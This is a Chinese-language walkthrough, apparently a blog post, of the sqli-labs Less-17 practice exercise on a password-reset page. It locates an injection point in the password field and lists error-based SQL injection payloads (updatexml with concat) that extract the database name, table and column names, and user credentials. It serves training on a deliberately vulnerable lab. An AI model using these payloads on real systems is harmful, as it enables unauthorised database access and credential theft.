B站教学视频很详细

【sql注入之sqli-labs系列教程(less11-17)】sqli-labs_33_less17_哔哩哔哩_bilibili

我将SQL语句在页面中显示，以便更深入学习。

1.寻找注入点

修改密码的一个页面。

输入正确的账号密码，可以看到，账号为admin，密码修改admin——admin

密码换成123

使用hackbar插件

对username进行注入，会发现输入的 ' 被转义了，寻找其他注入点

对password部分进行注入，发现注入点

2.报错注入

关于报错注入的知识点：详细请看第十一题http://t.csdnimg.cn/zoU7J

1'order by 2 判断列数

1'union select 1,updatexml(1,concat(0x7e,database()),1)%23 爆版本号、数据库名、权限等

1'union select 1,updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1)),1)%23 爆表名

1'union select 1,updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)),1)%23 爆列名

1'union select 1,updatexml(1,concat(0x7e,(select username from users limit 0,1)),1)%23

1'union select 1,updatexml(1,concat(0x7e,(select password from users limit 0,1)),1)%23 爆账号密码

或者1'union select username,password from users limit 1,1 %23